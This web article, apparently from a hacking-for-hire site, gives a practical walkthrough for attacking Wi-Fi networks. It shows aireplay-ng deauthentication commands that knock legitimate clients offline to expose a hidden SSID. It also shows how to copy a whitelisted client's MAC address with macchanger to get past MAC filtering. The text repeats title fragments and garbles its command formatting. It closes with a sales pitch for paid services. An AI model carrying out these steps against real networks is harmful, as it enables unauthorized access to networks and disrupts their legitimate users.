HOW TO KNOW HIDDEN-WI-FI NAME AND BYPASS FILTERING BY MAC,
To perform a high-quality penetration test of wireless access points, you need to purchase a pair of USB Wi-Fi adapters with suitable chips and modify them. Connect directional external antennas for wardriving instead of the standard ones and increase the transmitter power by increasing the txpower value. HOW TO KNOW HIDDEN-WI-FI NAME.
The hidden name of the wireless network and the filtering of clients by MAC addresses are weak in preventing hacking. The SSID and suitable addresses from the “white list” are easy to find out by simply waiting for the next handshake or immediately performing a deauthorization attack. We will talk about how to find out the name of the hidden WiFi network and how to bypass MAC filtering in this article.
How to find the name of a hidden WiFi network
The wireless network name (SSID or ESSID) is sometimes hidden to protect it. Indeed, this is how neophytes are cut off and the flow of those wishing to connect to the AP is noticeably reduced: if the target is not visible, many do not attack it. However, finding out the SSID is quite simple: this information is constantly broadcast on the air.
Each client indicates in the handshake the network name (SSID), its digital identifier (BSSID, usually the same as the MAC AP), and its MAC address. Therefore, a deauthorization attack is successfully used to find out the SSID of hidden networks. If we manage to intercept the handshake when a legal client connects to the selected access point, then we will immediately find out its name. It is enough to write a simple command and wait.
It is assumed that your wardriving adapter is defined as wlan1, its power has already been increased, and it itself is switched to monitor mode. If not yet, then just knock it down (ifconfig wlan1 down), and airodump-ng will put it into monitor mode by itself. HOW TO KNOW HIDDEN-WI-FI NAME.
It will take indefinitely for a handshake, so let’s speed up the process. Let’s open a second terminal window and send a broadcast deauthorization command in it. Forcing all clients of the selected AP to reconnect and shout its SSID for the whole air.
aireplay-ng -0 5 -a D8: FE: E3: XX: XX: XX wlan1
With this command, we sent five deauth packets to all clients of the access point with the MAC address D8: FE: E3:. And so on (I hide part of the address, as usual, enjoying paranoia). The result was not long in coming.
Almost immediately, the name of the network appeared in the main window of airodump-ng. While it was hidden, its length was displayed instead of a name (in this example, six characters).
How to bypass filtering by MAC-address
Additionally, admins create white lists of wireless devices, allowing only devices with specific MAC addresses to connect. In MAC filtering mode, the access point will refuse authorization to third-party devices, even if the correct password is received from them.
However, something else is important to us: if the client device has connected to the selected access point. Then it is guaranteed to be on its “white list”. All that remains is to kick it away from the target AP and assign that (openly broadcast) MAC address to your Wi-Fi adapter. In order to have time to connect instead of a trusted device. It is better to run the deauthorization command in parallel in another terminal window and send them from the second dongle. This is how it looks in stages on the AP from the example above.
Raise the power of the adapter, mask its MAC address, and put it into monitor mode.
We listen to the broadcast(HOW TO KNOW HIDDEN WI-FI NAME AND BYPASS FILTERING)
airodump-ng wlan1 The table will display the access points and the MAC addresses of the clients connected to them. (see the STATION column opposite the required AP).
We assign this MAC address to one of our dongles(HOW TO KNOW HIDDEN WI-FI NAME AND BYPASS FILTERING BY MAC)
macchanger –mac = 64: DB: 43: XX: XX: XX wlan1 From the second adapter helmet deauthorization packages:
aireplay-ng -0 5 -a D8: FE: E3: XX: XX: XX wlan1 We connect with the first adapter as soon as the real client is cut off from the AP.
That’s all. Now you know how to find out the SSID of the hidden network and find out the client’s MAC addresses.
WE ARE HERE FOR SERIOUS BUSINESS, WE DO NOT TOLERATE TIME WASTERS AND BEGGARS TRYING TO BEG OR SCAM US OF OUR PRODUCTS. Payment is Upfront, Our services are not free